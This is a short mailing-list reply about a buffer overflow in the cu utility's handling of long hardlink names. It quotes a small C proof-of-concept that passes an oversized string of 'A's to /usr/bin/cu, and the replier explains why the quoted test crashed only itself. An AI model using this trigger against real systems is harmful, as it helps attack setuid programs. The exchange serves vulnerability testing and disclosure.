Dan Harkless <[EMAIL PROTECTED]> wrote:
>Are you implying the above patches fix the cu long hardlink name
>vulnerability? This is not the case, at least on 2.6:
>
> # cat > cu_exploit.c
> #include <stdio.h>
>
> void main(int argc,char **argv)
> {
> char *buf;
>
> buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> memset(buf,0x41,atoi(argv[1])-1);
> buf[atoi(argv[1])-1]=0;
> execl("/usr/bin/cu",buf,(char *)0);
> }
> # gcc cu_exploit.c
> cu_exploit.c: In function `main':
> cu_exploit.c:4: warning: return type of `main' is not `int'
> # a.out
> Segmentation fault
see that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or
whatever number next time, or trace through it with gdb.
-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
